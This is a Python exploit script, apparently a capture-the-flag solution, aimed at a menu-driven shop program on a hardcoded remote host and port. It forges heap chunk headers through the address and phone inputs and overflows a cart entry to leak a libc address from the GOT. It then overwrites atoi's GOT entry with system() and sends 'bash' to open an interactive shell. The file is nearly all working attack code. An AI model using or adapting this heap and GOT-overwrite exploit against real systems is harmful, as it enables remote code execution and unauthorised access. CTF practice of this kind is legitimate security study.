shaxian.py

1. from pwnpwnpwn import *
2. import re
3.  
4.  
5. host = "180.76.178.48"
6. #host = "10.211.55.16"
7. port = 23333
8. #port = 8888
9.  
10. sock = make_conn(host,port)
11.  
12. atoi_got = 0x804b038
13.  
14. def create(sock,data,many):
15.     recvuntil(sock,":")
16.     sendline(sock,"1")
17.     recvuntil(sock,"5.Jianjiao")
18.     sendline(sock,data)
19.     recvuntil(sock,"?")
20.     sendline(sock,str(many))
21.  
22. def review(sock):
23.     recvuntil(sock,":")
24.     sendline(sock,"4")
25.     recvuntil(sock,"Cart:")
26.     data = recvuntil(sock,"Total")
27.     val = int(data.split("\n")[-2].split("*")[1].strip())
28.     if val < 0 :
29.         val += 0x100000000
30.     return val
31.  
32. addr = pack32(0) + pack32(0x31)
33. phone = "a"*0xf0 + pack32(0) + pack32(0x31)
34.  
35. recvuntil(sock,":")
36. sendline(sock,addr)
37. recvuntil(sock,":")
38. sendline(sock,phone)
39.  
40. payload = "b"*32 + pack32(0x804b034)
41. create(sock,payload,1)
42. startmain = review(sock)
43. libc = startmain -0x186c0
44. #libc = startmain - 0x19970
45.  
46. put_off = 0x62780
47. stratmain_off = 0x186c0
48. print "libc :",hex(libc)
49. system = libc + 0x3bf80
50. system -= 0x100000000
51.  
52. payload = "c"*32 + pack32(0x804b1b8)
53. create(sock,payload,1)
54.  
55. recvuntil(sock,":")
56. sendline(sock,"2")
57.  
58. payload = "a"*4
59. payload += pack32(atoi_got)
60.  
61.  
62. create(sock,payload,system)
63. recvuntil(sock,":")
64. sendline(sock,"bash")
65. inter(sock)